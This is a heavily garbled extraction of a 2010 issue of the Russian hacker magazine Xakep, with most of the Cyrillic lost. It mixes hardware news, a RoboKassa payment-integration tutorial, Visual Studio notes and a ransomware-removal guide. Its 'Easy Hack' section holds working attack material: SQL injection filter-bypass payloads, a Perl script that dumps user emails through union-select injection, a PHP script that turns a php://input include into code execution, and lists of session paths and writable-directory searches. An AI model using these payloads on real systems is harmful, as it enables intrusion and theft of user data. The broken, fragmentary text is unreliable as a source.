.
210
:
04 (135) 2010
DEP
HARDWARE-DEP
. 68
.NET REMOTING:
GRID-
CAPTCHA:
. 96
. 44
ACTIVEX
135
. 58
LINUX ?
. 90
http://group.xakep.ru
INTRO
: http://group.xakep.ru.
,
, ,
,
.
: -
6
, .
,
.
:
,
.
, : http://group.xakep.ru
, nikitozz
CONTENT
MegaNews
004
080
084
090
Ferrum
016
PC_ZONE
020
025
026
030
ACM ICPC: ,
GNU Screen tmux
Linux -
096
099
.NET
102
.NET Remoting:
grid-
.NET Framework
Shareware- Symbian
034
Easy-Hack
106
038
SYN/ACK
044
CAPTCHA:
110
050
Unserialize
115
054
120
IN DA FOCUS
058
122
064
128
068
DEP
074
X-Tools
ActiveX
Error-based SQL-Injection
hardware-DEP
C#
CFEngine 2
VPN
134
PSYCHO:
140
FAQ UNITED
076
143
144
WWW2
002
2010
:
-
FAQ
8.5
web-
X 04 /135/ 10
026
044
CAPTCHA:
068
DEP
hardware-DEP
128
VPN
/
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
>
(bergman@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-
(novikov.e@gameland.ru)
>
(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>
/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>
>
>
>
>
>
>PR-
>
>
>
090
Linux
-
>
> Gameland TV
>
(strekneva@gameland.ru)
>
>
>
(ashomko@gameland.ru)
> -
>
(korenfeld@gameland.ru)
>
>
(andrey@gameland.ru)
>
(devald@gameland.ru)
>
(kosheleva@gameland.ru )
>
(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999
>
101000, ,
, / 652,
,
77-11802 14
2002 .
Lietuvas Rivas, .
100 000 .
.
. :
. ,
,
.
.
.
.
:
content@gameland.ru
, , 2009
003
MEGANEWS
MIFRILL
MARIA.NEFEDOVA@GLC.RU
MEGANEWS
- ,
, ,
. Cleankeys Touch Sensitive
Cleankeys Inc. , ,
, ,
. Cleankeys Touch Sensitive
, ,
!
, , ,
. , , ,
, $450
$400 , - .
,
. ,
. ,
.
GOOGLE WIKIMEDIA
FOUNDATION.
004
, -
,
. :
Virus Total (www.virustotal.com) 20 10
. ,
.
, ,
, Virus Total.
,
10
10
14
,
. Virus Total
Hispasec Sistemas,
,
, ,
. ,
Virus Total ,
. ,
, , ,
,
.
MEGANEWS
NOKIA.
?
AMAZON KINDLE
3
.
Maemo,
, Nokia
. , , Nokia
Intel ,
MeeGo,
, ,
.
,
: Moblin (Mobile Linux) Maemo,
. , MeeGo
Symbian,
, , ,
Nokia N900.
Linux
kernel.org ,
, .
Qt,
Nokia. , MeeGo
.
-
EKinoT.ru, IT eBay,
Twitter, Cisco Systems, Howcast, Edventure,
Social Gaming Network Mozilla,
.
, , Twitter
, , Catalys.
? ? ,
Dreamtorrent ( torrents.ru) -,
,
,
-.
,
,
.
: .ru . torrents.ru :
Cherokee (www.cherokee-project.com) -, ,
,
HTTP-.
.
TWITTER : 1
, 17%.
MEGANEWS
16- , 10
. , ?
Cyber ShockWave Bipartisan
Policy Center.
, CNN.
: -
,
, , -
,
. , , .
,
, ,
. .
, :
:).
,
, , ? ,
! : ? ,
!
Digital Access. 26 Digital Access ivi.
ru, 9.000
, , - , . .
?, , , ,
. , vs . ivi.ru :
uravo.tv, 30- .
Rambler , ,
. , , Digital Access
, 2011
20% .,
.
:
44- .
, ,
, eBay
, , 16 . ,
, . , ,
,
, . ,
eBay ,
- PayPal, , ,
, .
, . ,
- (, - )
, , : .
, :
, , ! eBay, ,
,
. .
MEGANEWS
,
24 .
NVIDIA OPTIMUS
NVIDIA: ,
. NVIDIA Optimus ,
. NVIDIA
, . , NVIDIA
Optimus , , ,
ASUS UL50Vf, N61Jv, N71Jv, N82Jv U30Jc.
USB 3.0
USB 3.0 SATA 6 /
,
,
, . ,
,
?
GA-USB3.0 Gigabyte.
PCI-Express x1
USB 3.0. GA-USB3.0
Molex,
.
$40.
MEGANEWS
RADEON HD 5830
AMD 3D
ATI Radeon HD 5830,
,
Gigabyte, Sapphire,
XFX . ,
AMD . ATI Radeon HD
5830
5770 5850. ATI Radeon HD
5800 $240.
:
40- Cypress
1120 ,
56 1 GDDR5.
800 4000
. ATI Radeon HD 5830
DirectX 11, ATI Eyefinity, CrossFireX ATI Stream.
,
,
Radeon HD 5830 .
,
- ,
Globalscale GuruPlug Server. . 99
,
ARM: Marvell Kirkwood 1.2 , 512 DDR2 800 ,
802.11g, Bluetooth-,
Ethernet, 2 USB2.0, .
ARM- Debian
2.6.32, , , . Ethernet eSATA,
PLUS 30 . www.globalscaletechnologies.com , ,
shipito.com,
. , ,
: 5
175 .
WIMAX FORUM,
WIMAX
620 .
, 2011
1 .
PWN2OWN 2010
500000 !
:
3- .
Google
Chrome $1337,
Pwn2Own, security- CanSecWest , .
4- ,
$100000. $40000,
(Microsoft Internet Explorer,
Mozilla Firefox, Google Chrome,
Apple Safari),
(XP Vista, Windows
7, Mac OS X Snow Leopard).
-
.
Apple iPhone
3GS, RIM Blackberry Bold 9700,
Nokia Symbian
S60 (, E62),
Motorola
Google Android.
.
,
Safari, Firefox
Internet Explorer 8,
(
Nils ),
. ?
MEGANEWS
, ,
pleaserobme.com ( ,
)
.
,
,
.
:
-
Twitter. ,
,
.
,
.
SCANSAFE , 2009
80%
PDF-.
GSM ,
4G
19 1710-1785 1805-1885
GSM .
, ,
. , , .
, .
, Delta, Air France, Lufthansa, Emirates .
15
LTE (Long Term
Evolution) . CDMA/UMTS
326,4 / , 172,8 / .
: WiMax vs. LTE,
, .
LTE 2009 .
-,
, .
: -, ,
,
. Symantec , ,
. Live PC Care
! , , ,
.
,
,
( $30100).
.
Y2K , 10
- PlayStation 3
,
. Y2k,
?
, PS3. -
28 1
2010 PlayStation 3
( Slim- ), , (
) PlayStation
Network. PSN
: An error
has occurred. You have been signed out of PlayStation
Network (8001050F)
, Failed to install
trophies. Please exit your game.
1 2000 (
). Sony 2010 ,
. ,
29 1 .
, 24
, . ,
Zeus
. SpyEye
2009,
. Zeus,
.
-,
(C&C) .
, (1.0.7) Kill Zeus. SpyEye
Windows API
HttpSendRequestA,
Zeus . ,
SpyEye,
Zeus,
, Zeus C&C-
(,
) , , .
Zeus.
FERRUM
.
.
, .
, , ? ,
.
, .
NVIDIA ATI,
, , low-end .
. ATI ,
NVIDIA CUDA PhysX, ,
. , ATI Stream,
CUDA. , , ATI ( ,
).
. NVIDIA 512 ,
ATI 256- . ,
GDDR5,
.
. NVIDIA 55 -, ATI 40 . , NVIDIA
40 .
, , . ,
. ,
, . 3DMark 2003,
Red Faction: Guerrilla, Resident Evil 5 Batman: Arkham Asylum.
, ,
1680x1050 , ,
016
:
PALIT GEFORCE GT 220
PALIT GEFORCE GT 220 SONIC
PALIT GEFORCE GT 240 SONIC
SAPPHIRE RADEON HD 4650
SAPPHIRE RADEON HD 4670 ULTIMATE
SAPPHIRE RADEON HD 5750
. Red Faction: Guerrilla 1280x1024 , .
,
,
, .
NVIDIA
e
Palit GeForce
GT 220 Sonic
50
GPU,
,
Sapphire
Radeon HD 5750
PALIT GEFORCE
GT 220
1800 .
:
, : 40
, : 635
, : 800
: DDR2
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
DDR2 , ,
,
. .
, .
Palit
GeForce GT
240 Sonic
Palit GeForce
GT 220 Sonic
Sapphire
Radeon HD 5750
PALIT GEFORCE
GT 220 SONIC
:
, : 40
, : 650
, : 900
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
2000 .
Sonic .
,
Palit GeForce GT 220. -,
GDDR3,
, .
-, 10 650 900
, ( , 625
790 ). ,
, Palit
. , , 128- 1 -,
. VGA, HDMI DVI. ,
.
.
,
.
017
FERRUM
PALIT GEFORCE
GT 240 Sonic
SAPPHIRE RADEON
HD 4650
3500 .
NVIDIA
. , GDDR5,
. Sonic ( 95 ) ( 35 ), . ,
ATI Radeon Sapphire Radeon HD 5750.
,
,
.
, ,
, ,
- .
018
, : 40
, : 585
, : 945
: GDDR5
, : 1024
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
40
, : 55
, : 600
, : 700
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
1700 .
, ,
, , .
low-end,
. , , ,
Sapphire Radeon HD 4650 . HDMI, VGA
DVI, . .
, . , ,
Red Faction: Guerrilla.
. , ,
, , .
3DMARK 2003,
Sapphire Radeon HD
5750
.
,
Sapphire Radeon HD
5750
.
SAPPHIRE RADEON
HD 4670 Ultimate
SAPPHIRE RADEON
HD 5750
, : 55
, : 750
, : 873
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
3100 .
, : 40
, : 700
, : 1150
: GDDR-5
, : 1024
, : 128
: PCI EXPRESS 2.0
DIRECTX: 11
5700 .
,
. - , , Sapphire
Radeon HD 4670 Ultimate, ,
.
, ,
. .
, ,
.
.
, ,
,
DirectX 11. , ,
,
, . ,
, . ,
.
, ( ). , -
, ,
.
, , ,
. ,
.
, ,
-
. , ,
.
Sapphire Radeon
HD 5750,
, .
Palit GeForce GT 220 Sonic
..z
019
PC_ZONE
gurza brain@bidiko.ru
! , !
, . -,
? ?
? .
,
Webmoney. , ,
: ,
. ,
. , ,
,
.
,
.
, ,
. , , ,
, . :
,
.
,
? , .
( PDF- ),
, SMS.
Robokassa'
(www.robokassa.ru), -
020
. ,
,
- ,
, ,
- ,
.
,
.
(.,
Webmoney )? !
SMS? .
.
,
? , 9 . .
,
5% .
, .
,
! , , , PHP (+ curl)
jQuery,
ROBOKASSA
-,
PHP,
.
RoboKassa
API-.
,
. , :
PHP, Perl , ,
ASP Python .
HTTP- GET
POST URL https://merchant.roboxchange.com.
. RoboKassa :
1. URL RoboKassa,
,
.
2. RoboKassa
,
.
. -, , RoboKassa,
: bidiko.ru/test/xa/payments.php?item=1
, ,
.
3. RoboKassa
Result- .
, URL- Fail (
,
),
Success (
). URL- Result- Success, Fail RoboKassa
.
:
1.
URL-,
:
// Invoice number
$inv_id = 0;
// Custom Shp_ parameters that travel with the payment
$shp_item = $item;
$shp_user = 'TestUser';
// MD5 signature over login, sum, invoice number, $mrh_pass1 and the Shp_ parameters
$crc = md5("$mrh_login:$out_summ:$inv_id:$mrh_pass1:Shp_item=$shp_item:Shp_user=$shp_user");
// Payment URL
$url = "https://merchant.roboxchange.com/Index.aspx?MrchLogin=$mrh_login&OutSum=$out_summ&InvId=$inv_id&Desc=$inv_desc&Shp_item=$shp_item&Shp_user=$shp_user&SignatureValue=$crc";
,
GET.
MrchLogin
ajax- XML
RoboKassa. demo.
OutSum /
.
InvId .
,
.
,
(
RoboKassa),
.
Desc /,
, ,
URL.
Shp_item, Shp_user :
Shp_item .
Shp_user
(, ).
,
(InvId),
RoboKassa
, ,
, /.
,
, SignatureValue
, - md5 "$mrh_login:$out_summ:$inv_id:$mrh_pass1:Shp_item=$shp_item:Shp_user=$shp_user".
,
$mrh_pass1 .
,
RoboKassa. ,
.
2. , ,
URL.
.
3.
, Result-, : -,
, -,
(
) ,
. ,
Bad sign, OK<% %>.
Result-.
// Read the parameters sent to the Result URL
$out_summ = $_REQUEST["OutSum"];
$inv_id = $_REQUEST["InvId"];
$shp_item = $_REQUEST["Shp_item"];
$shp_user = $_REQUEST["Shp_user"];
$crc = $_REQUEST["SignatureValue"];
$crc = strtoupper($crc);
// Recompute the signature locally with $mrh_pass2
$my_crc = strtoupper(md5("$out_summ:$inv_id:$mrh_pass2:Shp_item=$shp_item:Shp_user=$shp_user"));
,
Result-, -.
, , ,
.
,
API- RoboKassa, -
021
PC_ZONE
.
.
, .
1. , (
, ,
..). ,
.
,
.
2.
.
,
,
.
.
,
,
ajax-,
( ,
) ,
.
curl:
,
.
payments.php.
$item
/ (
),
GET. payments.php
, ( )
022
. payments.php.
<?php
// item
// item
//
?>
<div id="xmlConsole">
//
</div>
<div id="pay_systems">
//"" /
<table class="pay_table">
//
</table>
</div>
payments.php (
)
,
switch.
,
,
, .
,
,
.
.
: ,
(,
),
.
, .
,
. Result-
"bad sign", ,
/ , , .
2
RoboKassa,
RoboKassa, ,
.
, ,
RoboKassa,
email. ,
-
! RoboKassa,
URL
.
pay_table.
: ,
:
: <b id="PayCode"></b>
<b>.</b>
PayCode .
, . PCR.
,
URL ( $url)
.
,
,
$url .
<a href="<?php echo $url.'&IncCurrLabel=PCR'; ?>"></a>
,
.
XML-
ROBOKASSA JQUERY
,
.
XML- RoboKassa.
XML- POST www.roboxchange.com/xml/rate.asp.
:
RK
<robox.rate.req>
<out_curr>OUTCURR</out_curr>
<merchant_login>LOGIN</merchant_login>
<out_cnt>CNT</out_cnt>
</robox.rate.req>
OUTCURR
(
RoboKassa), LOGIN
, CNT
.
XML- RoboKassa
<robox.rate.resp>
<retval>nRetCode</retval>
<out_curr>sOutCurrLabel</out_curr>
<out_cnt>nOutCount</out_cnt>
<date>sDateODBC120</date>
<ratelist>
<rate>
<in_curr>sIncCurrLabel</in_curr>
<in_curr_name>sIncCurrName</in_curr_name>
<value>nValuet</value>
<ins_per_Xout>nInCount</ins_per_Xout>
</rate>
</ratelist>
</robox.rate.resp>
: nRetCode , 0 , (
.
RoboKassa www.robokassa.ru/Doc/Ru/Interface.aspx);
sOutCurrLabel
;
nOutCount
;
sDateODBC120 , ( "yyyy-mm-dd
hh:mm:ss", GMT);
<rate> , ,
RoboKassa.
<rate>
in_curr ,
payments.php PayCode;
ins_per_Xout, ,
, ,
,
.
, XML- RoboKassa,
jQuery ( rk_xml_int.js).
ajax().
function getXML(url, cnt){
$.ajax({
url: url,
type: 'POST',
dataType: 'xml',
data: {cnt: cnt},
beforeSend: xmlStart,
success: xmlSuccess,
error: xmlError,
complete: xmlComplete
});
}
getXML() .
url
URL-,
. cnt
. ,
ajax(),
, xmlStart, xmlSuccess, xmlError,
xmlComplete, . . ,
url ,
.
PHP- XMLHTTPREQUEST
, script.js,
serv1.com,
serv2.com
XMLHttpRequest.
- rk_rate_proxy.php.
: rk_xml_int.js XMLHttpRequest
XML- rk_rate_proxy.php (
),
curl XML RoboKassa,
. .
XML- curl
:
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: close'));
$url XML-
RoboKassa,
rk_rate_proxy.php. $request
, , XML-,
:
$request = '<robox.rate.req>';
$request .= '<out_curr>RUR</out_curr>';
$request .= '<merchant_login>demo</merchant_login>';
$request .= '<out_cnt>'.$cnt.'</out_cnt>';
$request .= '</robox.rate.req>';
demo.
curl ,
. ,
023
PC_ZONE
xmlError(), , XML-
.
div-""
.
function xmlError(xhrInstance, message, optional) {
    $("#xmlConsole").html('<h2><font color="red">!</font></h2>');
    $("#pay_systems").css('display', 'none');
}
XML-
xmlComplete(),
id=xmlConsole CSS- ajaxLoaderCSS,
xmlSuccess(),
parseXML() XML-.
parseXML()
jQuery JavaScript, .
DVD
dvd
$result = curl_exec($ch);
header('Content-type: text/xml');
echo $result;
, PHP- rk_rate_proxy.php .
.
Ajax- ,
XMLHttpRequest ,
. ,
ajax().
. xmlStart()
XML-.
CSS- div id=xmlConsole.
ajaxLoaderCSS
. - www.ajaxload.info,
. xmlStart()
.
function xmlStart(xhrInstance) {
    $("#xmlConsole").addClass("ajaxLoaderCSS");
}
024
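function parseXML(xml){
    // Walk every <rate> element of the response
    $( xml ).find('rate').each(function(){
        // Currency label
        var curr = $(this).find('in_curr').text();
        // Value of ins_per_Xout for that currency
        var val = $(this).find('ins_per_Xout').text();
        // Write it into the element whose id is the currency label
        $('#'+curr).html(val);
    });
}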
. XML-,
payments.php
<script type="text/javascript">
$(function() {
<?php
$tmp_out_summ = (int) $out_summ;
echo "getXML('rk_rate_proxy.php', $tmp_out_summ);";
?>
});
</script>
getXML() ,
, DOM-
.
.
, . ? !
. , , ,
.
. . z
STEP TWITTER.COM/STEPAH
ACM ICPC: c , ,,
ACM-ICPC,
IBM, . ,
, : ,
. IBM :
, , . ?!
- ,
. ,
, .
, 30
. ACM-ICPC
.
: -
,
, .
(, ,
)
. ,
- IBM
, . -
: !
, , .
103
.
( , ), - .
20 .
, ,
ACM ICPC ,
.
,
, ,
. 11
. 18
. , ,
. ?
: . !
. , , ,
5 , 11
.
,
ACM ICPC
, .
, , ,
,
IBM Smarter Planet ( )
, ,
,
,
,
. ,
,
,
.
. , , ,
,
.
C, C++ Java
.
,
,
.
,
. ,
,
,
, .
? , .
30
,
.
,
.
. , -
: , ?
? ,
three, two, one . ,
. ,
.
: ACM-ICPC
, .
: , ()
- ().
. , ,
. z
025
PC_ZONE
i-vizaik@microsoft.com
?
Visual Studio 2010
,
,
, Visual Studio
2010
12 2010.
:).
2009 . ,
,
. , ,
.
?
! ,
.
,
.
UI
(IDE Integrated
Development Environment) ,
, . :
026
,
.
.
Visual Studio 2010 :
.
:
,
.
,
.
, ,
Visual Studio
, 2010
. ,
Call Hierarchy ( )
(" ?", "
") ,
.
Find All References.
,
IDE
Visual Studio 2010
Call Hierarchy
, .
,
,
,
.
. Visual Studio 2010
, ,
.
, Navigate
To ( ,
CTRL+)
level-up
,
. ,
.
, ,
,
.
,
.
, .
. :
, (private). ,
, , , . , SHIFT+ALT ( )
,
, ,
.
.
, ,
\\.
-
( code snippets) HTML
JavaScript.
,
, . Visual Studio 2010
.
.
. Watch:
,
.
,
,
,
. .
, , ,
.
,
.
IntelliTrace,
.
:
.
: , , , : ,
,
, !
:
,
, . , ,
,
,
,
, ,
, .
,
.
? :
. ,
.NET Framework 4,
Visual Studio 2010,
,
.
.
027
PC_ZONE
.NET FRAMEWORK 4
(deadlock).
:
, (),
.
Visual Studio 2010 : (Parallel Stacks)
(Parallel Tasks).
,
. ,
,
, :
.
: ,
.
,
,
.
, , ,
028
, ,
.
,
Visual Studio
2010 .
,
:
(Concurrency
Profiling),
,
.
, , .
Tier Interaction Profiler.
,
. -,
, . ,
ASP.NET -
Visual
Studio 2010 .NET
Framework 4,
. , ,
:
.
: BigInteger
Complex.
. ,
,
.
.NET Framework
Managed Extensibility Framework (MEF)
().
, .
,
MEF.
Visual Studio 2010.
, .NET Framework
4
.
System.Threading.
, WPF
:
DataGrid, Calendar DataPicker, ,
.
JavaScript Internet
Explorer 8.
,
,
, ,
.
, ,
,
-. ,
,
.
RESHARPER?
INFO
Visual Studio
2010 JetBrains ReSharper (www.jetbrains.com).
, , -.
, ReSharper, Visual Studio 2010, C# 4 VB10,
ASP.NET
ASP.NET MVC.
,
, LINQ
,
.
,
,
,
.
info
Microsoft
i-vizaik@microsoft.com
IntelliTrace
,
.
:
,
.
C# VB ,
,
. -
Microsoft Excel,
Basic, .
Navigate To
EXPRESS- !
029
PC_ZONE
Step twitter.com/stepah
!
xakep 31337.
SMS, ,
, , Microsoft , , , , . .
Trojan.Winlock ,
, ,
.
(
Ransomware ransom,
), ,
SMS . , :
,
Microsoft
,
, ,
,
SMS.
(, , ,
030
),
, ,
, , .
,
,
,
SMS .
-
. ,
,
, . , , ,
, .
, , , .
TDL3,
. ,
( , ,
). ,
,
( ).
,
, , ,
, , .
,
, ?
, .
- ,
.
, .
1. , ,
.
,
,
.
Dr.Web
wmic
(WMI Command-line),
,
:
wmic /NODE:<
> ( /
NODE:192.168.1.12) /USER:<
>
(, /USER:yastep)
,
. process. ,
.
:
delete:
process where name="< >" delete
, , .
2. Windows XP/2000,
<WIN-U>
,
.
- ,
,
.
3. ,
,
.
LiveCD.
,
,
ERD Commander.
,
: 5.0 Windows XP, 6.0 Windows
Vista, 6.5 Windows 7/Server 2008 R2.
,
.
rescue-
LiveCD ,
: Dr.Web LiveCD
(www.freedrweb.com/livecd) Kaspersky
Rescue Disk (devbuilds.kaspersky-labs.com/devbuilds/RescueDisk).
4. ,
,
. ,
, ,
,
, ,
, .
,
,
, , ,
.
,
. ,
,
,
, ,
SMS .
:
:
support.kaspersky.ru/viruses/deblocker;
Dr.Web:
http://www.drweb.com/unlocker/index;
Eset: www.esetnod32.ru/.support/winlock.
RansomHide (http://softget.net/freeware/projects/RansomHide/ransomhide.exe). SMS
,
. ,
- ,
.
, ,
. ,
(
,
, Hijackthis, Autoruns OSAM).
,
, .
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit, , Winlogon ,
. , Winlogon
Userinit.exe,
logon-,
,
Explorer.exe, ..
Windows. Userinit.exe
- ,
, Windows
Explorer, , ,
.
,
:
Userinit = %systemfolder%\userinet.exe, [ ]
. ,
tmp,
Windows.
,
%systemfolder%\userinit.exe.
- shell ( , userinit),
explorer.exe
.
,
,
. ,
, .
NTFS? .
streams (technet.microsoft.com/en-us/sysinternals/bb897440.aspx)
, : "streams.exe -d -s c:\".
, -
031
PC_ZONE
Hijackthis
(
,
), ,
( ):
Kaspersky Virus Removal Tool (avptool.virusinfo.info) , ,
. ,
.
,
.
Dr.Web CureIt! (www.freedrweb.com/cureit)
,
,
.
,
.
,
,
, ,
- :
AVZ (www.z-oleg.com/secur/avz) , ,
, .
-
AVZ
032
. AVZ
,
,
,
. ,
API-.
HijackThis (free.antivirus.com/hijackthis)
, AVZ, ,
, .
,
.
security-,
,
virusinfo.info.
, AVZ/HijackThis,
-, AVZ.
, AVZ
-> /
-
! virusinfo.info
!
virusinfo.info.
, , DLL-,
Internet Explorer , .
HTML,
,
,
.
LiveCD Dr.Web
80
ERD
Commander
,
,
, , ,
. ,
.
HKEY_CURRENT_USER,
, HKEY_LOCAL_MACHINE,
.
, . ,
DisableRegedit DisableRegistryTools:
SMS-,
SMS ?
SMS .
, .
Google' sms , . ,
, , - , Google , .
, , .
, .
, : , , . .
, , , SMS , ,
( ),
. , , , , .
, . , . , : SMS
, SMS
.
.
exe-,
reg- :
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@="\"%1\" %*"
,
.
(,
regedit.exe) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options.
,
,
Debugger.
,
.
:
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe"
INFO
info
, ,
ProcessExplorer
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths.
,
, , -
. .
,
exe -
DisableTaskMgr. reg-:
,
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0
,
-
.
,
, . popup
SMS . ,
,
Internet Explorer
Firefox'. ,
, . Internet Explorer
>
> ,
Firefox'
> .z
033
Spyder spyder@antichat.net
Cr@wler crawler@xakep.ru
Easy Hack
1
: SQL-INJECTION
:
, ,
, . , ,
,
.
%09
%0A
%0B
%0C
%0D
horizontal tab,
NL line feed,
vertical tab,
NP form feed,
carriage return,
. :
id=-1%0Aunion%0Aselect%0A1
C , , , :
<?php
if(isset($_GET['id']) && $_GET['id']!=''){
    if(strstr($_GET['id']," ")) {die("HACK ALERT");}
    if(strstr($_GET['id'],"/**/")) {die("HACK ALERT");}
    if(strstr($_GET['id'],"+")) {die("HACK ALERT");}
    if(strstr($_GET['id'],"%20")) {die("HACK ALERT");}
}
- $_GET[id]
: OPENVPN
:
OpenVPN
, . , ,
whoami root, : :) ?.
VPN-.
1. tun: modprobe tap && lsmod | grep tap
2. , OpenVPN.
C lzo,
: locate lzo.so
3. , ,
. - ,
. (
, )
linux.
tar xzvf lzo.tgz
cd lzo
./configure
make
make install
2. MySQL SQL- ,
:
select id/*!,title*/ from news
news id title. , :
id=-1/*!union*/select/*!version()*/
, .
, .
:
id=(-1)union(select(version()))
4. , lzo , openvpn
lzo:
tar xzvf vpn.tgz
cd vbb
./configure
make
make install
5. .
. /etc/openvpn/,
openvpn easy-rsa sample-config-files
/etc/openvpn/easy-rsa :
./vars ( )
./clean-all (
keys )
./build-ca ( )
./build-key-server server ( X.509 )
Common name
. client, server.
6. ,
./build-dh
7. , .
touch /etc/openvpn/server.conf
OpenVPN
port 443
proto tcp
dev tap
cipher DES-EDE3-CBC
reneg-sec 60
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh2048.pem
server 10.10.200.0 255.255.255.0
client-config-dir ccd
push "dhcp-option DNS 222.222.222.222"
push "dhcp-option DNS 22.22.222.222"
push "redirect-gateway"
keepalive 10 120
persist-key
persist-tun
comp-lzo
verb 0
8. ip- iptables:
: PHP-
:
2004 SecurityLab , php-
php://input. , .
, , :
<?php
if(isset($_GET['page'])) {include($_GET['page']);}
10. , .
, :). OpenVPN -
, ,
.
phpinfo().
2. PHP- .
<?php
if (isset($_GET['cmd']) && isset($_GET['host']) && isset($_GET['script'])) {
$host = stripslashes(@$_GET['host']);
$script = stripslashes(@$_GET['script']);
$cmd = htmlspecialchars_decode(stripslashes(@$_GET['cmd']));
$cmd = '<?php ' . $cmd . ' ?>';
$request = "POST /" . $script . "php://input" . " HTTP/1.1\r\n";
$request .= "Accept-Language: en\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
035
:
SQL-
: , . ,
.
#!/usr/bin/perl
use LWP::Simple; # LWP::Simple http
open(FH,">dump.txt"); #
$lim=0; # $lim limit
while(1) { #
$url="http://www.example.com/profile.php?id=-1+union+select+concat('c0de',email,'ed0c')+from+users+limit+$lim,1";
# SQL-, e-mail ,
$content = get("$url"); # get(),
if($content =~ m/c0de(.*)ed0c/) { # c -
:
:
, r57, c99 .
.
,
, , .
: ,
: ,
, ?
/tmp.
.
1. phpinfo() . session.save_handler. files , ,
session.save_path. Local Value,
( ), .htaccess.
036
3. :
http://localhost/input.php?host=www.example.
com&script=index.php?page=&cmd=phpinfo()
4. :).
# email
print FH $1."\n"; #
$lim++; # $lim
} else { #
print 'Total dumped ' . $lim; #
exit; #
}}
! ,
, .
dump-
, .
find . -user www -type d -ls , www
find . -user www -perm /222 -type d -ls ,
find . -group www -type d -ls ,
www
find . -perm -a+w -type d -ls ,
(, dr-xr-xrwx)
find . -perm -2 -type d -ls , drwxrwxrwx ,
rwx
Master Value , ,
php.ini.
2. .htaccess, php_value
session.save_path.
3. .
, .
/tmp/
/php_sess/
/tmp/phpsess/
/tmp/php/
/tmp/php-sess/
/home/%username%/tmp/
/var/phptemp/
/var/phptmp/
/var/phpsess/
/var/php-sess/
/var/lib/php/
/var/lib/php/session/
/var/lib/php3
/var/lib/php3/session/
/var/lib/php4/
/var/lib/php4/session/
/var/lib/php5/
/var/lib/php5/session/
/var/lib/php6/
: HTTPD.CONF
:
,
? , . ,
apache, init-, /etc/init.d/
bash- . :
pname=apache2
: ${sysconfdir:=/etc/$pname}
: ${apache_link:=/usr/sbin/httpd2}
: ${sysconfig_apache:=/etc/sysconfig/$pname}
:
WINLOCK,
SMS-.
:
, ( ).
, ,
, ( ). ,
(
, -,
..).
, , , ,
,
:).
(
, 300-600 ).
:
1. , (support.kaspersky.ru/viruses/deblocker) . ,
, (c:\
windows\temp, Temp
Sandboxie Temporary Internet Files, c:\documents and settings\
:)
_\Local Settings).
,
System Volume Information,
,
.
2. LiveCD-,
(freedrweb.
/var/lib/php6/
session/
/www/phpsession/
C:\Temp
C:\WINDOWS\Temp
C:\PHP\
sessiondata
phpinfo()
: ${pidfile:=/var/run/httpd2.pid}
: ${logdir:=/var/log/$pname}
httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf}
/etc/apache2/httpd.conf.
( )
-
messages,
.
locate httpd.conf
phpinfo()
.
com/livecd), BIOS ,
LiveCD . Live- Windows CureIt
( ERD Explorer, . .).
3. ,
( freedrweb.com/cureit).
4. , , , :
<Win+R>, gpedit.msc.
.
, Ok. . ,
,
Ctrl-Alt-Del.
regedit.exe, . HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr .
5.
, , (Default),
:
HKEY_CLASSES_ROOT\exefile\shell\open\command
HKEY_CLASSES_ROOT\exefile\shell\runas\command
"%1" %*.
. ,
, wuauclt.exe /detectnow, . , .
, LiveCD-, . ,
, virustotal.com. z
037
icq 884888, http://snipper.ru
, ! ,
. , ,
!
Bugzilla
Bugzilla advisory
01
02
BRIEF Gnome-screensaver
GNOME, , ,
openSUSE
. (
2.28.2 )
, , ,
.
.
GNOME-SCREENSAVER
, gdk_window_begin_implicit_paint() ( GTK+),
-
:)
EXPLOIT (
) - vigilance.fr:
1. (
);
2. ;
3. ;
4. ,
.
Enter, , ,
.
TARGETS gnome-screensaver <=2.28.2
SOLUTION ( 2.28.3)
live.gnome.org/GnomeScreensaver/.
038
PHPTHUMB
function SafeExec($command) {
